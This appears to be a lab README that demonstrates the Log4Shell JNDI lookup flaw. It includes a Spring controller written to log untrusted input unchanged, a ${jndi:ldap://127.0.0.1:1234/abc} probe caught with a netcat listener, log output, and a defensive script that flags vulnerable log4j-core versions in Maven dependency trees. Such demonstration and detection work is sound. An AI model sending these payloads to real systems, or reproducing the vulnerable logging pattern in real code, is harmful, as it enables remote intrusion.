Current vulnerabilities for log4j are:
- Lookup:
  - Log4j 1.x does not offer a lookup mechanism. Log4j 1.x sends an event encapsulating a string message to a JMS server. That is it. The attacker can supply whatever string they choose, but it remains a String. So not the same. At all.
  - Log4j 2.x is open to this attack because it performs a lookup, aka string substitution, using the JNDI protocol.
- JMSAppender:
  - Log4j 1.x is no longer being maintained, with all the security implications that entails.
  - Log4j 2.x adds LDAP code to handle the JMS manager in major version 2.15.
This project uses Spring Boot web REST services. Spring Boot offers a starter factory through which we define which SLF4J logging dependencies are going to be used.
Service exposed: http://localhost:9021/cve/fixme?vector=attack-vector
```java
import java.util.Arrays;
import java.util.List;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("cve")
public class TestLog4JCVE {
    Logger log4j = LoggerFactory.getLogger(TestLog4JCVE.class);

    // Deliberately logs the untrusted request parameter unchanged: with a
    // vulnerable log4j 2 binding, the message lookup resolves ${jndi:...}.
    @RequestMapping("/fixme")
    public List<String> fixMe(@RequestParam(name = "vector") String vector) {
        log4j.info("Received vector");
        log4j.info(vector);
        return Arrays.asList("cve", "check your log message");
    }
}
```
- Without problem:
- With vector attack: a service listening on port 1234 needs to be started first:

```sh
nc -l 1234
```
Using the Spring Boot web default configuration, which uses the logback library defined by spring-boot-starter-logging:

```
2021-12-15 08:14:28.843 INFO 80228 --- [nio-9021-exec-4] com.example.cvelog.TestLog4JCVE : Received vector
2021-12-15 08:14:28.843 INFO 80228 --- [nio-9021-exec-4] com.example.cvelog.TestLog4JCVE : ${jndi:ldap://127.0.0.1:1234/abc}
```

Validation: check the nc window to see whether any message appears.
We added the arrow-performance dependency, which pulls in the log4j library:

```xml
<dependency>
    <groupId>org.apache.arrow</groupId>
    <artifactId>arrow-performance</artifactId>
    <version>${arrow.version}</version>
</dependency>
```

They are in!
```
2021-12-15 09:28:51.952 INFO 85205 --- [nio-9021-exec-1] c.e.c.TestLog4JCVE : Received vector
//closing nc open connection
2021-12-15 09:29:13,360 http-nio-9021-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1:1234/abc]. javax.naming.NamingException: LDAP response read timed out, timeout used:-1ms.
...
2021-12-15 09:28:51.952 INFO 85205 --- [nio-9021-exec-1] c.e.c.TestLog4JCVE : ${jndi:ldap://127.0.0.1:1234/abc}
```
We added the blazingdb-calcite-core dependency, which pulls in the log4j library:

```xml
<dependency>
    <groupId>com.blazingdb</groupId>
    <artifactId>blazingdb-calcite-core</artifactId>
    <version>1.0.0.RC</version>
</dependency>
```
Log4j dependencies (`mvn dependency:tree`):

```
[INFO] --- maven-dependency-plugin:3.2.0:tree (default-cli) @ cve-log ---
[INFO] com.example:cve-log:jar:0.0.1-SNAPSHOT
[INFO] +- org.springframework.boot:spring-boot-starter-web:jar:2.6.1:compile
[INFO] \- com.blazingdb:blazingdb-calcite-core:jar:1.0.0.RC:compile
[INFO]    +- org.apache.calcite:calcite-core:jar:1.23.0:compile
[INFO]    \- org.slf4j:slf4j-log4j12:jar:1.7.32:runtime
[INFO]       \- log4j:log4j:jar:1.2.17:runtime
```
Validation: not affected by the attack vector (log4j 1.2.17 has no lookup mechanism).
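As an added example (not part of this project), a small script that walks `mvn dependency:tree` output such as the tree above and reports every Log4j jar together with the dependency path that brought it in, which is the check that tells arrow-performance (log4j 2) apart from blazingdb-calcite-core (log4j 1.x). The `example:hypothetical-lib` entry and the 2.14.1 log4j-core version in the sample are constructed.

```python
"""Parse `mvn dependency:tree` output and report every Log4j artifact with the
dependency path that pulls it in (added example; SAMPLE_TREE is constructed)."""
import re
# Each nested level in Maven's tree output is prefixed with "|  " or "   ".
LINE_RE = re.compile(r"^\[INFO\]\s(?P<indent>(?:\|\s\s|\s{3})*)[+\\]-\s(?P<coord>\S+)$")
LOG4J2_CORE = "org.apache.logging.log4j:log4j-core"  # performs JNDI lookups
LOG4J1 = "log4j:log4j"                                 # no lookup mechanism

def parse_version(version):
    """'2.14.1' -> (2, 14, 1); tolerates suffixes such as '1.0.0.RC'."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])

def classify(group_artifact, version):
    """Verdict for one artifact, or None when it is not a Log4j jar."""
    if group_artifact == LOG4J2_CORE:
        # CVE-2021-44228: message lookups resolve JNDI references before 2.15.0.
        return "VULNERABLE" if parse_version(version) < (2, 15, 0) else "patched"
    if group_artifact == LOG4J1:
        return "log4j-1.x (no lookups, but unmaintained)"
    return None

def scan_tree(tree_text):
    """Return (coordinate, verdict, path) for each Log4j artifact found."""
    stack = []        # coordinate at every depth of the branch being walked
    findings = []
    for line in tree_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # root line, plugin banner, or other noise
        depth = len(m.group("indent")) // 3
        coord = m.group("coord")
        stack[depth:] = [coord]      # pop deeper nodes, push this one
        parts = coord.split(":")     # group:artifact:type[:classifier]:version:scope
        verdict = classify(f"{parts[0]}:{parts[1]}", parts[-2])
        if verdict is not None:
            findings.append((coord, verdict, " -> ".join(stack)))
    return findings

# Constructed sample: the tree shown above plus a hypothetical lib pulling in an unpatched log4j-core.
SAMPLE_TREE = """\
[INFO] com.example:cve-log:jar:0.0.1-SNAPSHOT
[INFO] +- org.springframework.boot:spring-boot-starter-web:jar:2.6.1:compile
[INFO] +- com.blazingdb:blazingdb-calcite-core:jar:1.0.0.RC:compile
[INFO] |  +- org.apache.calcite:calcite-core:jar:1.23.0:compile
[INFO] |  \\- org.slf4j:slf4j-log4j12:jar:1.7.32:runtime
[INFO] |     \\- log4j:log4j:jar:1.2.17:runtime
[INFO] \\- example:hypothetical-lib:jar:1.0:compile
[INFO]    \\- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
"""
```

The 2.15.0 threshold follows the README; the 2.12.2 Java 7 backport and the follow-up CVEs fixed in 2.16.0 through 2.17.1 need their own rules if you use this beyond the original lookup issue.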